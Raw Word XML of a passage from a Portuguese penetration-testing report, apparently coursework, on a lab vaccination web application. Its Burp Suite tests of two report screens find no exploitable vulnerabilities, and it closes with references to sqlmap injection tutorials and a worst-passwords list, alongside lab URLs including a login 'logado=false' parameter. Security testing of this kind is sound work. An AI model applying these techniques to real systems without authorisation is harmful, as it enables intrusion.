        </w:rPr>
        <w:t>Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00015DE3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="2124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Utilizar o Burp Suite para descobrir as vulnerabilidades existentes na tela Relatório e indicar as possíveis técnicas que devem ser utilizadas </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para explorar as vulnerabilidades encontradas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00015DE3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="0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751591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>Resultados obtidos no momento de gerar um relatório dos dados cadastrados no sistema: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Default="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRPr="003E38DF" w:rsidRDefault="00E77F75" w:rsidP="00E77F75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6400991" cy="4457511"/>
            <wp:effectExtent l="0" t="0" r="0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689" cy="44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8719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35</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>- Burp Suite utilizado para captura de parâmetros no cabeçalho de uma requisição HTTP na tela Relatório.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="008719F1" w:rsidRDefault="00751591" w:rsidP="008719F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pP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e acordo com o Burp Suite, a página não recebe nenhum parâmetro </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>pois todos os dados disponíveis da aplicação são trazidos direto da base de dados para a tela</w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00015DE3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t xml:space="preserve">Quando </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>se utiliza os campos de filtros na tela, não há requisição, pois a aplicação usa os dados</w:t>
      </w:r>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> carregados para filtrar os dados </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>que serão exibidos no relatório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  <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Mediante a esse contexto, não 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751591" w:rsidRPr="00015DE3" w:rsidRDefault="00751591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8C6DC7" w:rsidRPr="008719F1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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00015DE3" w:rsidRDefault="008C6DC7" w:rsidP="00751591">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2136"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>Resultados obtidos no momento de gerar uma impressão para um relatório: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Default="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRPr="00015DE3" w:rsidRDefault="00E77F75" w:rsidP="008C6D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273240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>Figura 36- Burp Suite utilizado para captura de parâmetros no cabeçalho de uma requisição HTTP na tela Impressão de Relatório.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00015DE3" w:rsidRDefault="00751591" w:rsidP="008C6DC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008719F1" w:rsidRDefault="008C6DC7" w:rsidP="008719F1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a mesma maneira que </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>foi detectado na tela Relatório</w:t>
      </w:r>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, a ferramenta indica que a tela </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Impressão de Relatório</w:t>
      </w:r>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> não gera nenhum tipo de requisição e não recebe nenhum parâmetro manipulável. Dessa forma, </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>não foram encontradas vulnerabilidades que pudessem ser exploradas.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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00906B58" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24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8"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Referências</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00B7131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C815A6" w:rsidRDefault="00C97F3F" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr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3">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00C815A6">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Piores Senhas 2015</w:t>
        </w:r>
      </w:hyperlink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4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SQLMAP usando POST</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId45"/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6" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00C815A6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:t>NT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7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NetBios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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId48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  <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SNM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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r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9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CORS</w:t>
        </w:r>
      </w:hyperlink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0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w3c - Especificação CORS</w:t>
        </w:r>
      </w:hyperlink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1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MYSQL</w:t>
        </w:r>
      </w:hyperlink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2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SQL Server</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00C815A6" w:rsidRDefault="00C97F3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3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Oracle</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00906B58" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="248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rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DB70B5" w:rsidRPr="008C6DC7" w:rsidRDefault="00DB70B5" w:rsidP="008C6DC7"/>
    <w:sectPr w:rsidR="00DB70B5" w:rsidRPr="008C6DC7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AB" w:rsidRDefault="005A68AB" w:rsidP="009A6B56">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="005A68AB" w:rsidRDefault="005A68AB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AB" w:rsidRDefault="005A68AB" w:rsidP="009A6B56">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="005A68AB" w:rsidRDefault="005A68AB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7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8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12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5">
    <w:nsid w:val="50632F5B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FAEE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>
    <w:nsid w:val="68F83A59"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="32D4740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4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41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43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35"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="16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8"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="15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41"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="12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15DE3"/>
    <w:rsid w:val="00022ED2"/>
    <w:rsid w:val="00025045"/>
    <w:rsid w:val="00046E12"/>
    <w:rsid w:val="000536AA"/>
    <w:rsid w:val="000673F6"/>
    <w:rsid w:val="00093CAB"/>
    <w:rsid w:val="000D3326"/>
    <w:rsid w:val="000E26E7"/>
    <w:rsid w:val="000E35CD"/>
    <w:rsid w:val="000E6FA1"/>
    <w:rsid w:val="000F06E4"/>
    <w:rsid w:val="00101063"/>
    <w:rsid w:val="001031B5"/>
    <w:rsid w:val="001151C8"/>
    <w:rsid w:val="001247A7"/>
    <w:rsid w:val="001609AB"/>
    <w:rsid w:val="001702C9"/>
    <w:rsid w:val="00174603"/>
    <w:rsid w:val="00190AAD"/>
    <w:rsid w:val="00191402"/>
    <w:rsid w:val="001968AD"/>
    <w:rsid w:val="00196FF2"/>
    <w:rsid w:val="001A5B8E"/>
    <w:rsid w:val="001B2F09"/>
    <w:rsid w:val="001C4F4D"/>
    <w:rsid w:val="001C7028"/>
    <w:rsid w:val="00201EA5"/>
    <w:rsid w:val="00204E77"/>
    <w:rsid w:val="002151B5"/>
    <w:rsid w:val="00236FDF"/>
    <w:rsid w:val="0024287E"/>
    <w:rsid w:val="00265310"/>
    <w:rsid w:val="00271556"/>
    <w:rsid w:val="002719E7"/>
    <w:rsid w:val="0027244F"/>
    <w:rsid w:val="00294FE0"/>
    <w:rsid w:val="0029632F"/>
    <w:rsid w:val="002A0DD8"/>
    <w:rsid w:val="002C467E"/>
    <w:rsid w:val="002C52C4"/>
    <w:rsid w:val="002D20FB"/>
    <w:rsid w:val="002E34E0"/>
    <w:rsid w:val="003164B7"/>
    <w:rsid w:val="00322A98"/>
    <w:rsid w:val="00323A19"/>
    <w:rsid w:val="00337476"/>
    <w:rsid w:val="00384E80"/>
    <w:rsid w:val="003A39F6"/>
    <w:rsid w:val="003A5422"/>
    <w:rsid w:val="003D141C"/>
    <w:rsid w:val="003E1ACB"/>
    <w:rsid w:val="003E38DF"/>
    <w:rsid w:val="003E7654"/>
    <w:rsid w:val="003F3756"/>
    <w:rsid w:val="003F56AB"/>
    <w:rsid w:val="00412443"/>
    <w:rsid w:val="00455AB7"/>
    <w:rsid w:val="00456110"/>
    <w:rsid w:val="0048383A"/>
    <w:rsid w:val="0049317F"/>
    <w:rsid w:val="004B1DCC"/>
    <w:rsid w:val="004B4607"/>
    <w:rsid w:val="004C1B81"/>
    <w:rsid w:val="004C783E"/>
    <w:rsid w:val="004E0A86"/>
    <w:rsid w:val="004E2307"/>
    <w:rsid w:val="004F3071"/>
    <w:rsid w:val="004F40AA"/>
    <w:rsid w:val="005352FA"/>
    <w:rsid w:val="00544368"/>
    <w:rsid w:val="00564674"/>
    <w:rsid w:val="00564D7D"/>
    <w:rsid w:val="00567ED2"/>
    <w:rsid w:val="00572A0D"/>
    <w:rsid w:val="00594AD8"/>
    <w:rsid w:val="005A5292"/>
    <w:rsid w:val="005A68AB"/>
    <w:rsid w:val="005B3078"/>
    <w:rsid w:val="005D3B2A"/>
    <w:rsid w:val="005D6685"/>
    <w:rsid w:val="005D6A2A"/>
    <w:rsid w:val="005F4015"/>
    <w:rsid w:val="005F6E06"/>
    <w:rsid w:val="006035EF"/>
    <w:rsid w:val="00603B2C"/>
    <w:rsid w:val="00626AC7"/>
    <w:rsid w:val="0063700A"/>
    <w:rsid w:val="00641283"/>
    <w:rsid w:val="006473CA"/>
    <w:rsid w:val="00650630"/>
    <w:rsid w:val="00654CAB"/>
    <w:rsid w:val="00654DEF"/>
    <w:rsid w:val="006612A3"/>
    <w:rsid w:val="006635A8"/>
    <w:rsid w:val="00670E3E"/>
    <w:rsid w:val="0068102E"/>
    <w:rsid w:val="006876BB"/>
    <w:rsid w:val="006A38D8"/>
    <w:rsid w:val="006C08DA"/>
    <w:rsid w:val="006C2DFF"/>
    <w:rsid w:val="006C31FD"/>
    <w:rsid w:val="006D73FC"/>
    <w:rsid w:val="006F6948"/>
    <w:rsid w:val="006F6982"/>
    <w:rsid w:val="00702C53"/>
    <w:rsid w:val="007067BC"/>
    <w:rsid w:val="0070782B"/>
    <w:rsid w:val="00707948"/>
    <w:rsid w:val="00736DBC"/>
    <w:rsid w:val="00751591"/>
    <w:rsid w:val="00762DFF"/>
    <w:rsid w:val="007E46A7"/>
    <w:rsid w:val="007F5D29"/>
    <w:rsid w:val="00807BFC"/>
    <w:rsid w:val="00825FE5"/>
    <w:rsid w:val="00834FAA"/>
    <w:rsid w:val="00837F79"/>
    <w:rsid w:val="00846A20"/>
    <w:rsid w:val="0084777A"/>
    <w:rsid w:val="00857C40"/>
    <w:rsid w:val="00870818"/>
    <w:rsid w:val="008719F1"/>
    <w:rsid w:val="008872A1"/>
    <w:rsid w:val="00892814"/>
    <w:rsid w:val="00892BCB"/>
    <w:rsid w:val="008A79EE"/>
    <w:rsid w:val="008B447D"/>
    <w:rsid w:val="008C6DC7"/>
    <w:rsid w:val="008D02E1"/>
    <w:rsid w:val="008D0530"/>
    <w:rsid w:val="00906B58"/>
    <w:rsid w:val="00934569"/>
    <w:rsid w:val="00944F31"/>
    <w:rsid w:val="00945AD3"/>
    <w:rsid w:val="00985A8F"/>
    <w:rsid w:val="009A2041"/>
    <w:rsid w:val="009A6B56"/>
    <w:rsid w:val="009A7448"/>
    <w:rsid w:val="009B63C8"/>
    <w:rsid w:val="009C102E"/>
    <w:rsid w:val="009C4FBC"/>
    <w:rsid w:val="009E0E00"/>
    <w:rsid w:val="009F30B5"/>
    <w:rsid w:val="00A03082"/>
    <w:rsid w:val="00A206ED"/>
    <w:rsid w:val="00A24E0E"/>
    <w:rsid w:val="00A338A6"/>
    <w:rsid w:val="00A63EAA"/>
    <w:rsid w:val="00A83EB9"/>
    <w:rsid w:val="00A93306"/>
    <w:rsid w:val="00A9523B"/>
    <w:rsid w:val="00A966EC"/>
    <w:rsid w:val="00AB1C01"/>
    <w:rsid w:val="00AB57A1"/>
    <w:rsid w:val="00AB70E4"/>
    <w:rsid w:val="00B42017"/>
    <w:rsid w:val="00B51059"/>
    <w:rsid w:val="00B560B0"/>
    <w:rsid w:val="00B71318"/>
    <w:rsid w:val="00B71A0F"/>
    <w:rsid w:val="00B800D4"/>
    <w:rsid w:val="00B846D4"/>
    <w:rsid w:val="00B854D0"/>
    <w:rsid w:val="00B959F5"/>
    <w:rsid w:val="00BB751B"/>
    <w:rsid w:val="00BC05C8"/>
    <w:rsid w:val="00BC1742"/>
    <w:rsid w:val="00BC1926"/>
    <w:rsid w:val="00BC5B4A"/>
    <w:rsid w:val="00BE58C0"/>
    <w:rsid w:val="00BF6E55"/>
    <w:rsid w:val="00C07952"/>
    <w:rsid w:val="00C12C3D"/>
    <w:rsid w:val="00C343E2"/>
    <w:rsid w:val="00C366F7"/>
    <w:rsid w:val="00C36925"/>
    <w:rsid w:val="00C3730D"/>
    <w:rsid w:val="00C624EB"/>
    <w:rsid w:val="00C815A6"/>
    <w:rsid w:val="00C97F3F"/>
    <w:rsid w:val="00CA5E41"/>
    <w:rsid w:val="00CB425C"/>
    <w:rsid w:val="00CD0164"/>
    <w:rsid w:val="00CD779F"/>
    <w:rsid w:val="00CE3185"/>
    <w:rsid w:val="00D24FC5"/>
    <w:rsid w:val="00D32318"/>
    <w:rsid w:val="00D4218C"/>
    <w:rsid w:val="00D44803"/>
    <w:rsid w:val="00D46C6B"/>
    <w:rsid w:val="00D50B6F"/>
    <w:rsid w:val="00D602EF"/>
    <w:rsid w:val="00D62225"/>
    <w:rsid w:val="00D65D65"/>
    <w:rsid w:val="00D77DFF"/>
    <w:rsid w:val="00D975CE"/>
    <w:rsid w:val="00DB70B5"/>
    <w:rsid w:val="00DE2F1B"/>
    <w:rsid w:val="00DF0646"/>
    <w:rsid w:val="00E01CAE"/>
    <w:rsid w:val="00E068E6"/>
    <w:rsid w:val="00E15301"/>
    <w:rsid w:val="00E27C4B"/>
    <w:rsid w:val="00E400F9"/>
    <w:rsid w:val="00E453D6"/>
    <w:rsid w:val="00E52417"/>
    <w:rsid w:val="00E77F75"/>
    <w:rsid w:val="00E92ED1"/>
    <w:rsid w:val="00EB09F2"/>
    <w:rsid w:val="00EC2366"/>
    <w:rsid w:val="00EC5D2B"/>
    <w:rsid w:val="00EF59CB"/>
    <w:rsid w:val="00F018F3"/>
    <w:rsid w:val="00F04EFF"/>
    <w:rsid w:val="00F05851"/>
    <w:rsid w:val="00F149B2"/>
    <w:rsid w:val="00F248C0"/>
    <w:rsid w:val="00F24DE3"/>
    <w:rsid w:val="00F52870"/>
    <w:rsid w:val="00F8563B"/>
    <w:rsid w:val="00FC374A"/>
    <w:rsid w:val="00FC41D3"/>
    <w:rsid w:val="00FE6FEB"/>
    <w:rsid w:val="00FF1C9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F5552-F867-4060-B657-D4D9DBD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hyperlink" Target="http://192.168.0.58/vacina/login.php?logado=false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hyperlink" Target="https://pt.wikipedia.org/wiki/NetBIOS" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3.org/TR/cor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hyperlink" Target="https://pt.wikipedia.org/wiki/Network_Time_Protoc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hyperlink" Target="https://www.teamsid.com/worst-passwords-2015/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.oracle.com/cd/B28359_01/appdev.111/b28370/commen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://software.dzhuvinov.com/cors-filter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192.168.0.58/vacina/index.php?pg=servidores" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpeg"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackertarget.com/sqlmap-post-request-injection/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/pt-br/library/ms188621(v=sql.10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www.teamsid.com/worst-passwords-2015/" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pt.wikipedia.org/wiki/Simple_Network_Management_Protoco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ev.mysql.com/doc/refman/5.7/en/comment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812D-5D84-4DA7-B79E-61891606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0</Pages>
  <Words>7482</Words>
  <Characters>40405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Diego</cp:lastModifiedBy>
  <cp:revision>168</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-05-25T02:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-06-12T16:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>